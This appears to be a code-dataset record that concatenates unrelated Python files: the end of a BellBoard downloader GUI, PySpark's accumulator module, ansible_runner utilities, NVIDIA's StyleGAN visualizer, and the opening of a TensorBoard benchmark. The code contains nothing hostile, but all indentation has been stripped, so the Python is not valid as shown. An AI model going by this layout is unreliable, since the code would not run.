download_q.put(url_andSaveName)
url_andSaveName = []
numberOfFilesToDownload += 1
if self.downloadOptions.checkbox["downloadCSV"].get() == True:
# Download CSV
print(" {}".format(saveName+'.csv'))
url_andSaveName.append(url+"&fmt="+"csv")
if saveName[-1] == os.path.join(" ", "")[-1]:
print(' Warning, filename not given, using "bellBoardDefault" instead!')
url_andSaveName.append(saveName+"bellBoardDefault"+".csv")
else:
url_andSaveName.append(saveName+".csv")
download_q.put(url_andSaveName)
url_andSaveName = []
numberOfFilesToDownload += 1
url = "{}".format(self.urlBefore)
print("Total number of files to download: {}".format(numberOfFilesToDownload))
# Create pool of threads
pool = [DownloadWorkerThread(download_q=download_q) for i in range(numberOfFilesToDownload)]
print("########################\n --- Download Started ---\n ########################")
# Start all threads
for thread in pool:
thread.start()
# Ask threads to die and wait for them to do it
for thread in pool:
thread.join()
print("#########################\n --- Download Complete ---\n #########################")
self.options.updateState("normal")
self.advancedOptions.updateState("normal")
self.downloadOptions.updateState("normal")
if __name__ == "__main__":
root=tk.Tk()
BB(root).pack(side="top", fill="both", expand=True)
root.mainloop()
|
accumulators.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
>>> from pyspark.context import SparkContext
>>> sc = SparkContext('local', 'test')
>>> a = sc.accumulator(1)
>>> a.value
1
>>> a.value = 2
>>> a.value
2
>>> a += 5
>>> a.value
7
>>> sc.accumulator(1.0).value
1.0
>>> sc.accumulator(1j).value
1j
>>> rdd = sc.parallelize([1,2,3])
>>> def f(x):
... global a
... a += x
>>> rdd.foreach(f)
>>> a.value
13
>>> b = sc.accumulator(0)
>>> def g(x):
... b.add(x)
>>> rdd.foreach(g)
>>> b.value
6
>>> from pyspark.accumulators import AccumulatorParam
>>> class VectorAccumulatorParam(AccumulatorParam):
... def zero(self, value):
... return [0.0] * len(value)
... def addInPlace(self, val1, val2):
... for i in xrange(len(val1)):
... val1[i] += val2[i]
... return val1
>>> va = sc.accumulator([1.0, 2.0, 3.0], VectorAccumulatorParam())
>>> va.value
[1.0, 2.0, 3.0]
>>> def g(x):
... global va
... va += [x] * 3
>>> rdd.foreach(g)
>>> va.value
[7.0, 8.0, 9.0]
>>> rdd.map(lambda x: a.value).collect() # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
Py4JJavaError:...
>>> def h(x):
... global a
... a.value = 7
>>> rdd.foreach(h) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
Py4JJavaError:...
>>> sc.accumulator([1.0, 2.0, 3.0]) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
Exception:...
"""
import select
import struct
import SocketServer
import threading
from pyspark.cloudpickle import CloudPickler
from pyspark.serializers import read_int, PickleSerializer
__all__ = ['Accumulator', 'AccumulatorParam']
pickleSer = PickleSerializer()
# Holds accumulators registered on the current machine, keyed by ID. This is then used to send
# the local accumulator updates back to the driver program at the end of a task.
_accumulatorRegistry = {}
def _deserialize_accumulator(aid, zero_value, accum_param):
from pyspark.accumulators import _accumulatorRegistry
accum = Accumulator(aid, zero_value, accum_param)
accum._deserialized = True
_accumulatorRegistry[aid] = accum
return accum
class Accumulator(object):
"""
A shared variable that can be accumulated, i.e., has a commutative and associative "add"
operation. Worker tasks on a Spark cluster can add values to an Accumulator with the C{+=}
operator, but only the driver program is allowed to access its value, using C{value}.
Updates from the workers get propagated automatically to the driver program.
While C{SparkContext} supports accumulators for primitive data types like C{int} and
C{float}, users can also define accumulators for custom types by providing a custom
L{AccumulatorParam} object. Refer to the doctest of this module for an example.
"""
def __init__(self, aid, value, accum_param):
"""Create a new Accumulator with a given initial value and AccumulatorParam object"""
from pyspark.accumulators import _accumulatorRegistry
self.aid = aid
self.accum_param = accum_param
self._value = value
self._deserialized = False
_accumulatorRegistry[aid] = self
def __reduce__(self):
"""Custom serialization; saves the zero value from our AccumulatorParam"""
param = self.accum_param
return (_deserialize_accumulator, (self.aid, param.zero(self._value), param))
@property
def value(self):
"""Get the accumulator's value; only usable in driver program"""
if self._deserialized:
raise Exception("Accumulator.value cannot be accessed inside tasks")
return self._value
@value.setter
def value(self, value):
"""Sets the accumulator's value; only usable in driver program"""
if self._deserialized:
raise Exception("Accumulator.value cannot be accessed inside tasks")
self._value = value
def add(self, term):
"""Adds a term to this accumulator's value"""
self._value = self.accum_param.addInPlace(self._value, term)
def __iadd__(self, term):
"""The += operator; adds a term to this accumulator's value"""
self.add(term)
return self
def __str__(self):
return str(self._value)
def __repr__(self):
return "Accumulator<id=%i, value=%s>" % (self.aid, self._value)
class AccumulatorParam(object):
"""
Helper object that defines how to accumulate values of a given type.
"""
def zero(self, value):
"""
Provide a "zero value" for the type, compatible in dimensions with the
provided C{value} (e.g., a zero vector)
"""
raise NotImplementedError
def addInPlace(self, value1, value2):
"""
Add two values of the accumulator's data type, returning a new value;
for efficiency, can also update C{value1} in place and return it.
"""
raise NotImplementedError
class AddingAccumulatorParam(AccumulatorParam):
"""
An AccumulatorParam that uses the + operators to add values. Designed for simple types
such as integers, floats, and lists. Requires the zero value for the underlying type
as a parameter.
"""
def __init__(self, zero_value):
self.zero_value = zero_value
def zero(self, value):
return self.zero_value
def addInPlace(self, value1, value2):
value1 += value2
return value1
# Singleton accumulator params for some standard types
INT_ACCUMULATOR_PARAM = AddingAccumulatorParam(0)
FLOAT_ACCUMULATOR_PARAM = AddingAccumulatorParam(0.0)
COMPLEX_ACCUMULATOR_PARAM = AddingAccumulatorParam(0.0j)
class _UpdateRequestHandler(SocketServer.StreamRequestHandler):
"""
This handler will keep polling updates from the same socket until the
server is shutdown.
"""
def handle(self):
from pyspark.accumulators import _accumulatorRegistry
while not self.server.server_shutdown:
# Poll every 1 second for new data -- don't block in case of shutdown.
r, _, _ = select.select([self.rfile], [], [], 1)
if self.rfile in r:
num_updates = read_int(self.rfile)
for _ in range(num_updates):
(aid, update) = pickleSer._read_with_length(self.rfile)
_accumulatorRegistry[aid] += update
# Write a byte in acknowledgement
self.wfile.write(struct.pack("!b", 1))
class AccumulatorServer(SocketServer.TCPServer):
"""
A simple TCP server that intercepts shutdown() in order to interrupt
our continuous polling on the handler.
"""
server_shutdown = False
def shutdown(self):
self.server_shutdown = True
SocketServer.TCPServer.shutdown(self)
def _start_update_server():
"""Start a TCP server to receive accumulator updates in a daemon thread, and returns it"""
server = AccumulatorServer(("localhost", 0), _UpdateRequestHandler)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
return server
|
__init__.py |
import json
import sys
import re
import os
import stat
import fcntl
import shutil
import hashlib
import tempfile
import subprocess
import base64
import threading
import pipes
import uuid
import codecs
import atexit
import signal
from distutils.spawn import find_executable
from ansible_runner.exceptions import ConfigurationError
try:
from collections.abc import Iterable, MutableMapping
except ImportError:
from collections import Iterable, MutableMapping
from io import StringIO
from six import string_types, PY2, PY3, text_type, binary_type
def cleanup_folder(folder):
"""Deletes folder, returns True or False based on whether a change happened."""
try:
shutil.rmtree(folder)
return True
except (FileNotFoundError, NotADirectoryError):
return False
def register_for_cleanup(folder):
'''
Provide the path to a folder to make sure it is deleted when execution finishes.
The folder need not exist at the time when this is called.
'''
atexit.register(cleanup_folder, folder)
class Bunch(object):
'''
Collect a bunch of variables together in an object.
This is a slight modification of Alex Martelli's and Doug Hudgeon's Bunch pattern.
'''
def __init__(self, **kwargs):
self.update(**kwargs)
def update(self, **kwargs):
self.__dict__.update(kwargs)
def get(self, key):
return self.__dict__.get(key)
def isplaybook(obj):
'''
Inspects the object and returns if it is a playbook
Args:
obj (object): The object to be inspected by this function
Returns:
boolean: True if the object is a list and False if it is not
'''
return isinstance(obj, Iterable) and (not isinstance(obj, string_types) and not isinstance(obj, MutableMapping))
def isinventory(obj):
'''
Inspects the object and returns if it is an inventory
Args:
obj (object): The object to be inspected by this function
Returns:
boolean: True if the object is an inventory dict and False if it is not
'''
return isinstance(obj, MutableMapping) or isinstance(obj, string_types)
def check_isolation_executable_installed(isolation_executable):
'''
Check that process isolation executable (e.g. podman, docker, bwrap) is installed.
'''
cmd = [isolation_executable, '--version']
try:
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
proc.communicate()
return bool(proc.returncode == 0)
except (OSError, ValueError) as e:
if isinstance(e, ValueError) or getattr(e, 'errno', 1) != 2: # ENOENT, no such file or directory
raise RuntimeError(f'{isolation_executable} unavailable for unexpected reason.')
return False
def dump_artifact(obj, path, filename=None):
'''
Write the artifact to disk at the specified path
Args:
obj (string): The string object to be dumped to disk in the specified
path. The artifact filename will be automatically created
path (string): The full path to the artifacts data directory.
filename (string, optional): The name of file to write the artifact to.
If the filename is not provided, then one will be generated.
Returns:
string: The full path filename for the artifact that was generated
'''
p_sha1 = None
if not os.path.exists(path):
os.makedirs(path, mode=0o700)
else:
p_sha1 = hashlib.sha1()
p_sha1.update(obj.encode(encoding='UTF-8'))
if filename is None:
fd, fn = tempfile.mkstemp(dir=path)
else:
fn = os.path.join(path, filename)
if os.path.exists(fn):
c_sha1 = hashlib.sha1()
with open(fn) as f:
contents = f.read()
c_sha1.update(contents.encode(encoding='UTF-8'))
if not os.path.exists(fn) or p_sha1.hexdigest() != c_sha1.hexdigest():
lock_fp = os.path.join(path, '.artifact_write_lock')
lock_fd = os.open(lock_fp, os.O_RDWR | os.O_CREAT, stat.S_IRUSR | stat.S_IWUSR)
fcntl.lockf(lock_fd, fcntl.LOCK_EX)
try:
with open(fn, 'w') as f:
os.chmod(fn, stat.S_IRUSR)
f.write(str(obj))
finally:
fcntl.lockf(lock_fd, fcntl.LOCK_UN)
os.close(lock_fd)
os.remove(lock_fp)
return fn
def cleanup_artifact_dir(path, num_keep=0):
# 0 disables artifact dir cleanup/rotation
if num_keep < 1:
return
all_paths = sorted([os.path.join(path, p) for p in os.listdir(path)],
key=lambda x: os.path.getmtime(x))
total_remove = len(all_paths) - num_keep
for f in range(total_remove):
shutil.rmtree(all_paths[f])
def dump_artifacts(kwargs):
'''
Introspect the kwargs and dump objects to disk
'''
private_data_dir = kwargs.get('private_data_dir')
if not private_data_dir:
private_data_dir = tempfile.mkdtemp()
kwargs['private_data_dir'] = private_data_dir
if not os.path.exists(private_data_dir):
raise ValueError('private_data_dir path is either invalid or does not exist')
if 'role' in kwargs:
role = {'name': kwargs.pop('role')}
if 'role_vars' in kwargs:
role['vars'] = kwargs.pop('role_vars')
play = [{'hosts': kwargs.pop('hosts', 'all'), 'roles': [role]}]
if kwargs.pop('role_skip_facts', False):
play[0]['gather_facts'] = False
kwargs['playbook'] = play
if 'envvars' not in kwargs:
kwargs['envvars'] = {}
roles_path = kwargs.pop('roles_path', None)
if not roles_path:
roles_path = os.path.join(private_data_dir, 'roles')
else:
roles_path += ':{}'.format(os.path.join(private_data_dir, 'roles'))
kwargs['envvars']['ANSIBLE_ROLES_PATH'] = roles_path
playbook = kwargs.get('playbook')
if playbook:
# Ensure the play is a list of dictionaries
if isinstance(playbook, MutableMapping):
playbook = [playbook]
if isplaybook(playbook):
path = os.path.join(private_data_dir, 'project')
kwargs['playbook'] = dump_artifact(json.dumps(playbook), path, 'main.json')
obj = kwargs.get('inventory')
if obj and isinventory(obj):
path = os.path.join(private_data_dir, 'inventory')
if isinstance(obj, MutableMapping):
kwargs['inventory'] = dump_artifact(json.dumps(obj), path, 'hosts.json')
elif isinstance(obj, string_types):
if not os.path.exists(obj):
kwargs['inventory'] = dump_artifact(obj, path, 'hosts')
for key in ('envvars', 'extravars', 'passwords', 'settings'):
obj = kwargs.get(key)
if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)):
path = os.path.join(private_data_dir, 'env')
dump_artifact(json.dumps(obj), path, key)
kwargs.pop(key)
for key in ('ssh_key', 'cmdline'):
obj = kwargs.get(key)
if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)):
path = os.path.join(private_data_dir, 'env')
dump_artifact(str(kwargs[key]), path, key)
kwargs.pop(key)
def collect_new_events(event_path, old_events):
'''
Collect new events for the 'events' generator property
'''
dir_events = os.listdir(event_path)
dir_events_actual = []
for each_file in dir_events:
if re.match("^[0-9]+-.+json$", each_file):
if '-partial' not in each_file and each_file not in old_events.keys():
dir_events_actual.append(each_file)
dir_events_actual.sort(key=lambda filenm: int(filenm.split("-", 1)[0]))
for event_file in dir_events_actual:
with codecs.open(os.path.join(event_path, event_file), 'r', encoding='utf-8') as event_file_actual:
try:
event = json.load(event_file_actual)
except ValueError:
break
old_events[event_file] = True
yield event, old_events
class OutputEventFilter(object):
'''
File-like object that looks for encoded job events in stdout data.
'''
EVENT_DATA_RE = re.compile(r'\x1b\[K((?:[A-Za-z0-9+/=]+\x1b\[\d+D)+)\x1b\[K')
def __init__(self, handle, event_callback,
suppress_ansible_output=False, output_json=False):
self._event_callback = event_callback
self._counter = 0
self._start_line = 0
self._handle = handle
self._buffer = StringIO()
self._last_chunk = ''
self._current_event_data = None
self.output_json = output_json
self.suppress_ansible_output = suppress_ansible_output
def flush(self):
self._handle.flush()
def write(self, data):
self._buffer.write(data)
# keep a sliding window of the last chunk written so we can detect
# event tokens and determine if we need to perform a search of the full
# buffer
should_search = '\x1b[K' in (self._last_chunk + data)
self._last_chunk = data
# Only bother searching the buffer if we recently saw a start/end
# token (\x1b[K)
while should_search:
value = self._buffer.getvalue()
match = self.EVENT_DATA_RE.search(value)
if not match:
break
try:
base64_data = re.sub(r'\x1b\[\d+D', '', match.group(1))
event_data = json.loads(base64.b64decode(base64_data).decode('utf-8'))
except ValueError:
event_data = {}
event_data = self._emit_event(value[:match.start()], event_data)
if not self.output_json:
stdout_actual = event_data['stdout'] if 'stdout' in event_data else None
else:
stdout_actual = json.dumps(event_data)
remainder = value[match.end():]
self._buffer = StringIO()
self._buffer.write(remainder)
if stdout_actual and stdout_actual != "{}":
if not self.suppress_ansible_output:
sys.stdout.write(
stdout_actual.encode('utf-8') if PY2 else stdout_actual
)
sys.stdout.write("\n")
sys.stdout.flush()
self._handle.write(stdout_actual + "\n")
self._handle.flush()
self._last_chunk = remainder
else:
# Verbose stdout outside of event data context
if data and '\n' in data and self._current_event_data is None:
# emit events for all complete lines we know about
lines = self._buffer.getvalue().splitlines(True) # keep ends
remainder = None
# if last line is not a complete line, then exclude it
if '\n' not in lines[-1]:
remainder = lines.pop()
# emit all complete lines
for line in lines:
self._emit_event(line)
if not self.suppress_ansible_output:
sys.stdout.write(
line.encode('utf-8') if PY2 else line
)
self._handle.write(line)
self._handle.flush()
self._buffer = StringIO()
# put final partial line back on buffer
if remainder:
self._buffer.write(remainder)
def close(self):
value = self._buffer.getvalue()
if value:
self._emit_event(value)
self._buffer = StringIO()
self._event_callback(dict(event='EOF'))
self._handle.close()
def _emit_event(self, buffered_stdout, next_event_data=None):
next_event_data = next_event_data or {}
if self._current_event_data:
event_data = self._current_event_data
stdout_chunks = [buffered_stdout]
elif buffered_stdout:
event_data = dict(event='verbose')
stdout_chunks = buffered_stdout.splitlines(True)
else:
event_data = dict()
stdout_chunks = []
for stdout_chunk in stdout_chunks:
if event_data.get('event') == 'verbose':
event_data['uuid'] = str(uuid.uuid4())
self._counter += 1
event_data['counter'] = self._counter
event_data['stdout'] = stdout_chunk[:-2] if len(stdout_chunk) > 2 else ""
n_lines = stdout_chunk.count('\n')
event_data['start_line'] = self._start_line
event_data['end_line'] = self._start_line + n_lines
self._start_line += n_lines
if self._event_callback:
self._event_callback(event_data)
if next_event_data.get('uuid', None):
self._current_event_data = next_event_data
else:
self._current_event_data = None
return event_data
def open_fifo_write(path, data):
'''open_fifo_write opens the fifo named pipe in a new thread.
This blocks the thread until an external process (such as ssh-agent)
reads data from the pipe.
'''
os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)
threading.Thread(target=lambda p, d: open(p, 'wb').write(d),
args=(path, data)).start()
def args2cmdline(*args):
return ' '.join([pipes.quote(a) for a in args])
def ensure_str(s, encoding='utf-8', errors='strict'):
"""
Copied from six==1.12
Coerce *s* to `str`.
For Python 2:
- `unicode` -> encoded to `str`
- `str` -> `str`
For Python 3:
- `str` -> `str`
- `bytes` -> decoded to `str`
"""
if not isinstance(s, (text_type, binary_type)):
raise TypeError("not expecting type '%s'" % type(s))
if PY2 and isinstance(s, text_type):
s = s.encode(encoding, errors)
elif PY3 and isinstance(s, binary_type):
s = s.decode(encoding, errors)
return s
def sanitize_container_name(original_name):
"""
Docker and podman will only accept certain characters in container names
This takes a given name from user-specified values and replaces the
invalid characters so it can be used in docker/podman CLI commands
"""
return re.sub('[^a-zA-Z0-9_-]', '_', text_type(original_name))
def cli_mounts():
return [
{
'ENVS': ['SSH_AUTH_SOCK'],
'PATHS': [
{
'src': '{}/.ssh/'.format(os.environ['HOME']),
'dest': '/home/runner/.ssh/'
},
{
'src': '{}/.ssh/'.format(os.environ['HOME']),
'dest': '/root/.ssh/'
},
{
'src': '/etc/ssh/ssh_known_hosts',
'dest': '/etc/ssh/ssh_known_hosts'
}
]
},
]
def santize_json_response(data):
'''
Removes warning message from response message emitted by ansible
command line utilities.
:param action: The string data to be santizied
:type action: str
'''
start_re = re.compile("{(.|\n)*", re.MULTILINE)
data = start_re.search(data).group().strip()
return data
def get_executable_path(name):
exec_path = find_executable(name)
if exec_path is None:
raise ConfigurationError(f"{name} command not found")
return exec_path
def signal_handler():
# Only the main thread is allowed to set a new signal handler
if threading.current_thread() is not threading.main_thread():
return None
signal_event = threading.Event()
# closure to set signal event
def _handler(number, frame):
signal_event.set()
signal.signal(signal.SIGTERM, _handler)
signal.signal(signal.SIGINT, _handler)
return signal_event.is_set
|
visualizer.py | # Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# NVIDIA CORPORATION and its licensors retain all intellectual property
# and proprietary rights in and to this software, related documentation
# and any modifications thereto. Any use, reproduction, disclosure or
# distribution of this software and related documentation without an express
# license agreement from NVIDIA CORPORATION is strictly prohibited.
import click
import os
import multiprocessing
import numpy as np
import imgui
import dnnlib
from gui_utils import imgui_window
from gui_utils import imgui_utils
from gui_utils import gl_utils
from gui_utils import text_utils
from viz import renderer
from viz import pickle_widget
from viz import latent_widget
from viz import stylemix_widget
from viz import trunc_noise_widget
from viz import performance_widget
from viz import capture_widget
from viz import layer_widget
from viz import equivariance_widget
#----------------------------------------------------------------------------
class Visualizer(imgui_window.ImguiWindow):
def __init__(self, capture_dir=None):
super().__init__(title='GAN Visualizer', window_width=3840, window_height=2160)
# Internals.
self._last_error_print = None
self._async_renderer = AsyncRenderer()
self._defer_rendering = 0
self._tex_img = None
self._tex_obj = None
# Widget interface.
self.args = dnnlib.EasyDict()
self.result = dnnlib.EasyDict()
self.pane_w = 0
self.label_w = 0
self.button_w = 0
# Widgets.
self.pickle_widget = pickle_widget.PickleWidget(self)
self.latent_widget = latent_widget.LatentWidget(self)
self.stylemix_widget = stylemix_widget.StyleMixingWidget(self)
self.trunc_noise_widget = trunc_noise_widget.TruncationNoiseWidget(self)
self.perf_widget = performance_widget.PerformanceWidget(self)
self.capture_widget = capture_widget.CaptureWidget(self)
self.layer_widget = layer_widget.LayerWidget(self)
self.eq_widget = equivariance_widget.EquivarianceWidget(self)
if capture_dir is not None:
self.capture_widget.path = capture_dir
# Initialize window.
self.set_position(0, 0)
self._adjust_font_size()
self.skip_frame() # Layout may change after first frame.
def close(self):
super().close()
if self._async_renderer is not None:
self._async_renderer.close()
self._async_renderer = None
def add_recent_pickle(self, pkl, ignore_errors=False):
self.pickle_widget.add_recent(pkl, ignore_errors=ignore_errors)
def load_pickle(self, pkl, ignore_errors=False):
self.pickle_widget.load(pkl, ignore_errors=ignore_errors)
def print_error(self, error):
error = str(error)
if error != self._last_error_print:
print('\n' + error + '\n')
self._last_error_print = error
def defer_rendering(self, num_frames=1):
self._defer_rendering = max(self._defer_rendering, num_frames)
def clear_result(self):
self._async_renderer.clear_result()
def set_async(self, is_async):
if is_async != self._async_renderer.is_async:
self._async_renderer.set_async(is_async)
self.clear_result()
if 'image' in self.result:
self.result.message = 'Switching rendering process...'
self.defer_rendering()
def _adjust_font_size(self):
old = self.font_size
self.set_font_size(min(self.content_width / 120, self.content_height / 60))
if self.font_size != old:
self.skip_frame() # Layout changed.
def draw_frame(self):
self.begin_frame()
self.args = dnnlib.EasyDict()
self.pane_w = self.font_size * 45
self.button_w = self.font_size * 5
self.label_w = round(self.font_size * 4.5)
# Detect mouse dragging in the result area.
dragging, dx, dy = imgui_utils.drag_hidden_window('##result_area', x=self.pane_w, y=0, width=self.content_width-self.pane_w, height=self.content_height)
if dragging:
self.latent_widget.drag(dx, dy)
# Begin control pane.
imgui.set_next_window_position(0, 0)
imgui.set_next_window_size(self.pane_w, self.content_height)
imgui.begin('##control_pane', closable=False, flags=(imgui.WINDOW_NO_TITLE_BAR | imgui.WINDOW_NO_RESIZE | imgui.WINDOW_NO_MOVE))
# Widgets.
expanded, _visible = imgui_utils.collapsing_header('Network & latent', default=True)
self.pickle_widget(expanded)
self.latent_widget(expanded)
self.stylemix_widget(expanded)
self.trunc_noise_widget(expanded)
expanded, _visible = imgui_utils.collapsing_header('Performance & capture', default=True)
self.perf_widget(expanded)
self.capture_widget(expanded)
expanded, _visible = imgui_utils.collapsing_header('Layers & channels', default=True)
self.layer_widget(expanded)
with imgui_utils.grayed_out(not self.result.get('has_input_transform', False)):
expanded, _visible = imgui_utils.collapsing_header('Equivariance', default=True)
self.eq_widget(expanded)
# Render.
if self.is_skipping_frames():
pass
elif self._defer_rendering > 0:
self._defer_rendering -= 1
elif self.args.pkl is not None:
self._async_renderer.set_args(**self.args)
result = self._async_renderer.get_result()
if result is not None:
self.result = result
# Display.
max_w = self.content_width - self.pane_w
max_h = self.content_height
pos = np.array([self.pane_w + max_w / 2, max_h / 2])
if 'image' in self.result:
if self._tex_img is not self.result.image:
self._tex_img = self.result.image
if self._tex_obj is None or not self._tex_obj.is_compatible(image=self._tex_img):
self._tex_obj = gl_utils.Texture(image=self._tex_img, bilinear=False, mipmap=False)
else:
self._tex_obj.update(self._tex_img)
zoom = min(max_w / self._tex_obj.width, max_h / self._tex_obj.height)
zoom = np.floor(zoom) if zoom >= 1 else zoom
self._tex_obj.draw(pos=pos, zoom=zoom, align=0.5, rint=True)
if 'error' in self.result:
self.print_error(self.result.error)
if 'message' not in self.result:
self.result.message = str(self.result.error)
if 'message' in self.result:
tex = text_utils.get_texture(self.result.message, size=self.font_size, max_width=max_w, max_height=max_h, outline=2)
tex.draw(pos=pos, align=0.5, rint=True, color=1)
# End frame.
self._adjust_font_size()
imgui.end()
self.end_frame()
#----------------------------------------------------------------------------
class AsyncRenderer:
def __init__(self):
self._closed = False
self._is_async = False
self._cur_args = None
self._cur_result = None
self._cur_stamp = 0
self._renderer_obj = None
self._args_queue = None
self._result_queue = None
self._process = None
def close(self):
self._closed = True
self._renderer_obj = None
if self._process is not None:
self._process.terminate()
self._process = None
self._args_queue = None
self._result_queue = None
@property
def is_async(self):
return self._is_async
def set_async(self, is_async):
self._is_async = is_async
def set_args(self, **args):
assert not self._closed
if args != self._cur_args:
if self._is_async:
self._set_args_async(**args)
else:
self._set_args_sync(**args)
self._cur_args = args
def _set_args_async(self, **args):
if self._process is None:
self._args_queue = multiprocessing.Queue()
self._result_queue = multiprocessing.Queue()
try:
multiprocessing.set_start_method('spawn')
except RuntimeError:
pass
self._process = multiprocessing.Process(target=self._process_fn, args=(self._args_queue, self._result_queue), daemon=True)
self._process.start()
self._args_queue.put([args, self._cur_stamp])
def _set_args_sync(self, **args):
if self._renderer_obj is None:
self._renderer_obj = renderer.Renderer()
self._cur_result = self._renderer_obj.render(**args)
def get_result(self):
assert not self._closed
if self._result_queue is not None:
while self._result_queue.qsize() > 0:
result, stamp = self._result_queue.get()
if stamp == self._cur_stamp:
self._cur_result = result
return self._cur_result
def clear_result(self):
assert not self._closed
self._cur_args = None
self._cur_result = None
self._cur_stamp += 1
@staticmethod
def _process_fn(args_queue, result_queue):
renderer_obj = renderer.Renderer()
cur_args = None
cur_stamp = None
while True:
args, stamp = args_queue.get()
while args_queue.qsize() > 0:
args, stamp = args_queue.get()
if args != cur_args or stamp != cur_stamp:
result = renderer_obj.render(**args)
if 'error' in result:
result.error = renderer.CapturedException(result.error)
result_queue.put([result, stamp])
cur_args = args
cur_stamp = stamp
#----------------------------------------------------------------------------
@click.command()
@click.argument('pkls', metavar='PATH', nargs=-1)
@click.option('--capture-dir', help='Where to save screenshot captures', metavar='PATH', default=None)
@click.option('--browse-dir', help='Specify model path for the \'Browse...\' button', metavar='PATH')
def main(
pkls,
capture_dir,
browse_dir
):
"""Interactive model visualizer.
Optional PATH argument can be used specify which .pkl file to load.
"""
viz = Visualizer(capture_dir=capture_dir)
if browse_dir is not None:
viz.pickle_widget.search_dirs = [browse_dir]
# List pickles.
if len(pkls) > 0:
for pkl in pkls:
viz.add_recent_pickle(pkl)
viz.load_pickle(pkls[0])
else:
pretrained = [
'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan3/versions/1/files/stylegan3-r-afhqv2-512x512.pkl',
'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan3/versions/1/files/stylegan3-r-ffhq-1024x1024.pkl',
'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan3/versions/1/files/stylegan3-r-ffhqu-1024x1024.pkl',
'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan3/versions/1/files/stylegan3-r-ffhqu-256x256.pkl',
'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan3/versions/1/files/stylegan3-r-metfaces-1024x1024.pkl',
'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan3/versions/1/files/stylegan3-r-metfacesu-1024x1024.pkl',
'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan3/versions/1/files/stylegan3-t-afhqv2-512x512.pkl',
'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan3/versions/1/files/stylegan3-t-ffhq-1024x1024.pkl',
'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan3/versions/1/files/stylegan3-t-ffhqu-1024x1024.pkl',
'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan3/versions/1/files/stylegan3-t-ffhqu-256x256.pkl',
'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan3/versions/1/files/stylegan3-t-metfaces-1024x1024.pkl',
'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan3/versions/1/files/stylegan3-t-metfacesu-1024x1024.pkl',
'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-afhqcat-512x512.pkl',
'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-afhqdog-512x512.pkl',
'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-afhqv2-512x512.pkl',
'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-afhqwild-512x512.pkl',
'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-brecahad-512x512.pkl',
'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-celebahq-256x256.pkl',
'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-cifar10-32x32.pkl',
'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-ffhq-1024x1024.pkl',
'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-ffhq-256x256.pkl',
'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-ffhq-512x512.pkl',
'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-ffhqu-1024x1024.pkl',
'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-ffhqu-256x256.pkl',
'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-lsundog-256x256.pkl',
'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-metfaces-1024x1024.pkl',
'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan2/versions/1/files/stylegan2-metfacesu-1024x1024.pkl'
]
# Populate recent pickles list with pretrained model URLs.
for url in pretrained:
viz.add_recent_pickle(url)
# Run.
while not viz.should_close():
viz.draw_frame()
viz.close()
#----------------------------------------------------------------------------
if __name__ == "__main__":
main()
#----------------------------------------------------------------------------
|
encode_png_benchmark.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Benchmarks for the `tensorboard.util.encode_png` function.
Here are the results of running this benchmark on a workstation running
Ubuntu 14.04 with an Intel(R) Xeon(R) CPU E5-1650 v4 @ 3.60GHz:
